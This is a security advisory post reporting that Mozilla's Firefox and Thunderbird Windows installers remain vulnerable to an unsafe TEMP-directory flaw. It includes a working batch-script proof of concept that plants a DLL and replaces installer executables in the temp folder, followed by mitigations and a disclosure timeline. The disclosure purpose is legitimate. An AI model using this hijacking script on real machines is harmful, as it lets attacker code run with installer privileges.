Hi @ll,

<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
      beginner's error!) is well-known and well-documented as
      <https://cwe.mitre.org/data/definitions/379.html>.


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   and save them in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>
   plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and
   save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
   save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
   and "SENTINEL.EXE" downloaded in step 1:

:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   downloaded in step 0. and proceed as directed: notice the message
   boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
   placed by the batch script started in step 3 in the unsafe TEMP
   subdirectory created by Mozilla's vulnerable executable installers!

PWNED!


Mitigation(s):
~~~~~~~~~~~~~~

0. don't use executable installers. DUMP THEM, NOW!

1. see <http://home.arcor.de/skanthak/!execute.html> as well as
   <http://home.arcor.de/skanthak/SAFER.html>.

2. stay away from Mozilla's vulnerable installers for their Windows
   software (at least until Mozilla starts to develop a sense for
   the safety and security of their users).


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-10-25    <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>

              not even an attempt to fix this vulnerability (check but
              <https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)

2016-04-30    <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>

              not even an attempt to fix this vulnerability (check but
              <https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)

2016-06-15    deadline expired after 45 days, report published